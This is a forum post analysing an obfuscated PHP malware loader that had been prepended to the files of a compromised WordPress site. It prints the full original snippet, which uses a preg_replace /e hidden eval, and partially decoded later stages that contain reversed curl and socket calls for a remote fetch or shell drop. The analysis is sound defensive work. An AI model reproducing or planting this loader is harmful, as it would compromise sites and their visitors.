Web Oriented Coding / Deobfuscating a php hack
« on: November 12, 2015, 06:19:02 pm »
A few days ago, I stumbled upon something weird on a WordPress site: all the .php files (config, plugins, themes, etc.) had been prepended with a heavily obfuscated PHP snippet.
Honestly, I don't really care how it got there in the first place: the WordPress site was outdated, so were its plugins, so I guess one of them had a vulnerability. However, I figured it would be quite interesting to check what it was doing, so I tried to deobfuscate it.
Disclaimer: I last coded in PHP ten years ago and have been largely uninterested in the language since then, so bear with me if this is all standard stuff.
Here is the original snippet :
The first thing I did was to decode hex and octal characters.
First there are some user agent checks, a data string, an array, and a function definition.
Then the interesting part boils down to a hidden eval: a preg_replace call with the /e modifier, which evaluates the replacement string as PHP code:
I echoed what was passed to eval() after the replacements functions took place, and got another function definition and another hex / octal obfuscated preg_replace :
This is where things get really interesting, but really complicated.
What I got after echoing the data passed in and decoding it is:
It looks like most of this string can be read in reverse (as hinted by strrev anyway) and some characters are replaced using rand functions.
We can easily see very interesting strings (headers, curl, ...); it looks like a remote access / shell-drop payload.
However I'm a bit stuck at this point, this code is beyond my php skills to fully reverse engineer.
Do you have any pointers to help me finish this?
Honestly, I don't really care how it got there in the first place: the WordPress site was outdated, so were its plugins, so I guess one of them had a vulnerability. However, I figured it would be quite interesting to check what it was doing, so I tried to deobfuscate it.
Disclaimer: I last coded in PHP ten years ago and have been largely uninterested in the language since then, so bear with me if this is all standard stuff.
Here is the original snippet :
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $pdwpfcjohw = 'w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{825:-t%x5c%x7825)3of:opjudovg<~%x578256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x782bfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5cr(ord($n)-1);} @error_reporting(0); pre]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fec%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%x6<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5cx5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x78x7827k:!ftmf!}Z;^nbsbq%x5c%x787]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83472%x5c%x7824<!%x5c%x7825mm!>!#]y81]2<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%%141%x72%164") && (!isset($GLOBA#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{sut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cdc%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyf7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%xx7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCc%x7825<#372]58y]472]37y]672]48y]#>825V<*#fopoV;hojepdoF.uofuopD#)sfec%x782f!#0#)idubn%x5c%x7860hfsq)!spd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<*)) { $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){return 
chT7-UFOJ%x5c%x7860GB)fu7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftD4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%A)qj3hopmA%x5c%x78273qj%x5c%x74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y3827rfs%x5c%x78256~6<%x5c%x787fw6<*7825mm)%x5c%x7825%x5c%x7878:!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpu{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825if((function_exists("%x6f%142%x5f%163%x74LS["%x61%156%x75%156%x61"]))**X)ufttj%x5c%x7822)gj!|!*!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!w6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tu}#-!tussfw)%x5c%x7825c*W%x5c%x7825**f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5w6Z6<.5%x5c%x7860hA%x5c%x782725)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fm3q%x5c%x7825}U;y]}R;2]},;osv-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuf]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]46x7825!>!2p%x5c%x7825!*x66%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%x70%154%x6-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x7825-bubEc%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbutc%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*o%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7R%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-Sc%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2%166%x61%154%x28%151%x6d6g]273]y76]271]y7d]252]yw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5c%x56]y81]265]y72]254]y]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]252]y7425%x5c%x785cSFWSFT%x5c%x7860%x5c%x78%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sx5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpgx7825:>:r%x5c%x7825:|:**t%x5c%x78)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1tww**WYsboepn)%x5c%x7825bss-%x5c%x7ppde#)tutjyf%x5c%x78604%x5c%x78223x782fh%x5c%x7825:<**#57]38y]47]67ydovg!|!**#j{hnpd#)tutjyf%x5c%x7860785c1^-%x5c%x7825r%x5c%x785c2^-%x573]y76]258]y6g]273]y76]271]y7d]252]y74]2561L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-[%
x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%xz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmo!%x5c%x7825bss%x5c%x785csboe)82f#M5]DgP5]D6#<%x5c%x7825fdy>#]x7825b:<!%x5c%x7825c:>%x5c%x7825s:%u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x7875:<#64y]552]e7y]#>n%x59%164%50%x22%134%x78%62%x35%165%x3a%146%x21%7q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x78N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x783>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>q%x5c%x7x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827p985-rr.93e:5597f-s.973:8297f:2400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-rc%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fpd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5827pd%x5c%x78256<pd%x5c%76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>s:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]V,6<*)ujojR%x5c%x7827id%x5c%x7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256fmy%x5c%x7825)utjm!|!*5!%%x782272qj%x5c%x7825)7gj6<822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bdde>u%x5c%x7825V<#65,47R2;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7bfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tc%x7878pmpusut!-#j0#!%x5c%x824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x7]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x78x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)uft2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQf<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)pp)1%x5c%x782f35.)1%x5c%x782f14+9**-)%x5c%x7824!>!fyqmpefpmdXA6~6<u%x5c%x78257>%
x5c%x782f7&6|7**111127-K)ebfsX%x5c%xx5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<24-%x5c%x7824*<!%x5c%x7824-%x5c%x7824g%x5c%x7827Y%x5c%x7825GFS%x5c%x7860QUUI&c_UOFHB%x5c%x2f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x78#!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%782f!**#sfmcnbs+yfeobuhofm%x5c%x7825:-5ppde:4:|:**#<!%x5c%x7825t::!>!%x5c%x7c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x7#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%57-K)fujs%x5c%x7878X6<#o%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npfr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]87827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSF#-#Y#-#D#-#W#-#C#-#O#-#*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787f%x5c%x7825)}.;%x5c%x7860UQPMSVD!K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7825c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x786>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825zji%x5c%x7878:<##:>:h%x5c%x782t%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gv]o]Y%x5c%x78257;utpI#7>%x5c%x782g_replace("%x2f%50%x2e%52%x29%57%x65","%x65,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x785,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#]#>m%x5c%x7825:|:*r%x5c%x7x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%8%x5c%x7824-%x5c%x7824]26%x5c0439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:ix5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}334}}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5hpph#)zbssb!-#}#)fepmqnj!%x5eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5cpdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%%x5c%x7824-%x5c%x782h%x5c%x7825)j{hnpd!opjububE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]24525nfd>%x5c%x7825fdy<Cb*%x787
8<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%c%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x66~6<&w6<%x5c%x787fw67860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c4]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvs56<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x782f77827u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x7829]271]y83]256]y78]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c6%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3fofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x57825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%8256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{6d%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7#6#)tutjyf%x5c%x786kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7]37]88y]27]28y]#%x5c%x782**2qj%x5c%x7825)hopm3qj%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61%160%x28%42%s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48ytj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825FGTOBSUOSVUFS,6<*msv%x5c%x78257-MS#-%x5c%x7825tmw)%x5c%x7825x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]3hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%0un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%x5c%x7825)sf%x5%x7825,3,j%x5c%x7825>j%x5825!*##>>X)!gjZ<#opo#>b%x5c%x7825!]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]2824Ypp3)%x5c%x7825cB%x5c%x7825iNutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;2]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", NULL); 
}ps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825c%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}24-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x765]D8]86]y31]278]y3f]55c}X%x5c%x7824<!%x5c%x7825tzw>!#2)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDP4*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x5c%x7825)s%x5c%x7825>%x5c%opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<#ufs}%x5c%x7827;mnui}&;zepc}A;~!825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74%x7824-%x5c%x7824<%x5c%x7825j,25}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%xx78b%x5c%x7825ggg!>!#]y81]273]y76]258]y%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%xboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%5297e:56-%x5c%x7878r.985:52985-t.98]K4])#%x5c%x7824*<!%x5c%x78251%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x5c7824y4%x5c%x7824-%x5c%x7824]y/(.*)/epreg_replaceqfbyqgiljb'; $idkmtooiel = explode(chr((154-110)),'1748,41,781,32,1789,28,1309,69,195,39,6550,43,2697,24,8503,68,2259,57,3617,45,8051,43,234,35,6896,47,2033,29,4312,60,5776,47,4372,24,4117,60,8246,63,1400,47,5353,59,7826,60,5862,24,6518,32,3850,63,1582,34,6243,53,9411,45,1378,22,144,51,4653,26,8480,23,1490,29,92,52,7767,59,4576,52,5115,68,8638,42,5565,21,498,54,9526,42,429,69,6045,56,8838,45,986,55,2580,59,8680,34,4546,30,8196,50,7484,21,6175,36,1893,61,8094,56,392,37,6211,32,2133,42,6475,43,9251,39,0,58,4770,45,2362,52,1683,65,1843,50,269,57,8786,52,7986,65,8947,25,2483,62,4628,25,5057,58,7218,61,813,57,7195,23,3224,34,9596,54,5663,37,2237,22,4001,55,4679,67,5886,51,1259,50,1988,45,4253,59,6337,55,8883,64,4852,27,5700,21,3423,38,7037,28,1224,35,1644,39,870,60,5183,67,6101,51,5586,31,7505,39,8392,63,8972,34,1817,26,326,66,7132,43,592,30,2866,36,9773,39,7544,62,1041,46,6296,41,4457,37,8309,20,6839,57,5721,30,3156,34,3785,65,2414,69,5473,54,3558,37,5250,48,4746,24,6658,56,4056,61,1190,34,4815,37,9108,41,2105,28,9650,31,6994,43,2639,58,3662,63,5617,46,9379,32,2806,6
0,9006,70,2786,20,4396,61,3913,28,3941,60,4206,47,9568,28,3190,34,8455,25,5937,57,3023,33,2062,43,6446,29,3595,22,1155,35,8571,67,6714,26,58,34,6943,51,681,37,3292,42,5823,39,552,40,9290,67,7671,46,2545,35,4879,52,7426,58,10077,29,6810,29,9743,30,6593,65,5527,38,9205,46,7175,20,9456,70,5333,20,10007,25,8329,63,5751,25,9076,32,1954,34,7065,67,2902,68,9899,69,1087,68,2745,41,3258,34,930,56,8714,26,3121,35,9681,62,4177,29,9968,39,9357,22,3334,40,4494,52,4931,62,3491,32,1447,43,7279,69,4993,64,7348,23,3374,49,8150,46,8740,46,622,59,2175,62,7717,50,3461,30,5298,35,10032,45,7371,55,2970,53,3056,65,718,63,3523,35,6740,70,5412,61,6392,54,7606,65,9851,48,1616,28,2316,46,7950,36,6152,23,3725,60,9812,39,2721,24,1519,63,7886,64,5994,51,9149,56'); $phikeisjmv=substr($pdwpfcjohw,(70252-60146),(37-30)); if (!function_exists('jzdiphfmiu')) { function jzdiphfmiu($vkqnkrobcb, $iokxjmjsnh) { $mwknqctosj = NULL; for($iltibddrih=0;$iltibddrih<(sizeof($vkqnkrobcb)/2);$iltibddrih++) { $mwknqctosj .= substr($iokxjmjsnh, $vkqnkrobcb[($iltibddrih*2)],$vkqnkrobcb[($iltibddrih*2)+1]); } return $mwknqctosj; };} $thecjqzgwu="\x20\57\x2a\40\x69\150\x72\165\x74\171\x6e\150\x66\166\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\65\x37\55\x31\62\x30\51\x29\54\x20\143\x68\162\x28\50\x35\71\x33\55\x35\60\x31\51\x29\54\x20\152\x7a\144\x69\160\x68\146\x6d\151\x75\50\x24\151\x64\153\x6d\164\x6f\157\x69\145\x6c\54\x24\160\x64\167\x70\146\x63\152\x6f\150\x77\51\x29\51\x3b\40\x2f\52\x20\160\x6f\160\x65\167\x6a\144\x63\145\x74\40\x2a\57\x20"; $xayhlwoeym=substr($pdwpfcjohw,(58620-48507),(74-62)); $xayhlwoeym($phikeisjmv, $thecjqzgwu, NULL); $xayhlwoeym=$thecjqzgwu; $xayhlwoeym=(379-258); $pdwpfcjohw=$xayhlwoeym-1; ?>
The first thing I did was to decode hex and octal characters.
First there are some user agent checks, a data string, an array, and a function definition.
<?php
// Stage 0: a User-Agent gate. A marker is written into $GLOBALS only when the
// visitor's UA contains neither "msie" nor "rv:11" (i.e. does not look like
// Internet Explorer). The same marker key reappears, hex-encoded, inside the
// obfuscated payload below, so later stages presumably re-check it -- TODO confirm.
if (!isset($GLOBALS["anuna"])) {
// strtolower() makes the two strstr() checks case-insensitive.
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11")))
$GLOBALS["anuna"] = 1;
}
// The large obfuscated data string from the original snippet; it holds the
// second stage with '%' standing in for '\' (see the str_replace in the next
// listing), plus the literal pattern and function name that are later sliced
// out of it with substr().
$pdwpfcjohw = '.....REDACTED.....';
// Comma-separated list of (offset, length) pairs; jzdiphfmiu() below walks it
// two entries at a time to cut slices out of $pdwpfcjohw and glue them together.
$idkmtooiel = explode(',', .....REDACTED.....);
// Reassembles a payload from a flat list of (offset, length) pairs: every pair
// selects one slice of $string and the slices are concatenated in list order.
// This is the loader's "scatter" decoding step: the real code is present in
// the data string, but only in pieces and out of order.
// Returns NULL (not "") when $array is empty, exactly like the original.
function jzdiphfmiu($array, $string) {
    $assembled = NULL;
    // Float on odd-length input, as in the original; the trailing unpaired
    // entry then yields an undefined-index read for its length.
    $pairCount = count($array) / 2;
    $pairIdx = 0;
    while ($pairIdx < $pairCount) {
        $offset = $array[2 * $pairIdx];
        $length = $array[2 * $pairIdx + 1];
        $assembled .= substr($string, $offset, $length);
        $pairIdx++;
    }
    return $assembled;
}
?>
Then the interesting part boils down to a hidden eval: a preg_replace call with the /e modifier, which evaluates the replacement string as PHP code (the modifier was removed in PHP 7.0, so this stage only executes on older interpreters):
<?php
// Pattern with the /e modifier: the replacement string is executed as PHP code
// instead of being substituted. In the original this literal is sliced out of
// the data string with substr(), so "/e" never appears in the file as such.
$phikeisjmv = "/(.*)/e";
// The replacement is PHP source: it rebuilds the second stage from the
// offset/length list and the data string, swaps '%' back to '\' (the stored
// payload writes backslash escapes as "%x5c", "%x78", ...) and evals the result.
// The surrounding /* ... */ comments are filler.
$thecjqzgwu = " /* ihrutynhfv */ eval(str_replace('%', '\\', jzdiphfmiu($idkmtooiel,$pdwpfcjohw))); /* popewjdcet */ ";
// The callee name is held in a variable (also cut from the data string in the
// original), so neither "preg_replace" nor "eval" appears literally in the file.
$xayhlwoeym = "preg_replace";
// The subject is NULL (an empty string); "(.*)" matches it once, so the
// replacement code runs once. On PHP >= 7.0 the /e modifier is rejected with a
// warning and nothing is evaluated, so this loader depends on an old runtime.
$xayhlwoeym($phikeisjmv, $thecjqzgwu, NULL);
?>
I echoed what was passed to eval() after the replacement functions had run, and got another function definition and another hex/octal-obfuscated preg_replace:
<?php
// Per-character decoder for the next stage: returns the character whose code
// is one less than $n's, i.e. the payload was stored shifted up by one
// (a Caesar-style shift of 1 over byte values). Used via array_map over
// str_split() of the encoded string.
function fjfgg($n) {
    $shifted = ord($n) - 1;
    return chr($shifted);
}
preg_replace("/(.*)/e", "eval(implode(array_map("fjfgg",str_split(".....REDACTED.....
?>
This is where things get really interesting, but really complicated.
What I got after echoing the data passed in and decoding it is:
<?php
$t9e = '$w9 ="/(.*)/e"; $v9 = #5656}5.6%5{6))000016,J(daerW&t$(6elihw5.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW@5{6))086,1pi$6,J(tcennocW@!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW@&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi@(pi2gnol@&2pi$5;)X$(emanybXteg@&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap@6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi@&%5;-elif@&cni$5;~v5)~^)"elifj3_z5}5= |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}}i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi }i$ ;))2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi ;))1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe@=1a$ ;)po$,)-$(dtg@(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ;)))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } ;))po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45@9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *@ = zd$( ==! 
eslaf( fi;)"j"(trats_boU~~~~t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|@:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W# "eval(str_replace(array" "str_replace";$slv = "strrev";$s1v="create_function" #//}9.g$9;))"46\27x\36.x\26?x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x\441\d6x\"=m$;"261'x\361\26x.1\37x\"=r$;"351\36xa\07x\"=p$;"651.x\451\27x\461\37x\"=l$9{9)q$9,s$(2ne9noitcnuf;}# #1067|416|779|223|361# "preg_replace" array(#\14#,#, $#,#) { #,#[$i]#,#substr($#,#a = $xx("|","#,#,strpos($y,"9")#,# = str_replace($#,#x3#,#\x7#,#\15#,#;$i++) {#,#function #,#x6#,#)0;$i
?>
It looks like most of this string can be read in reverse (as the strrev hints anyway), and some characters are replaced using the rand functions.
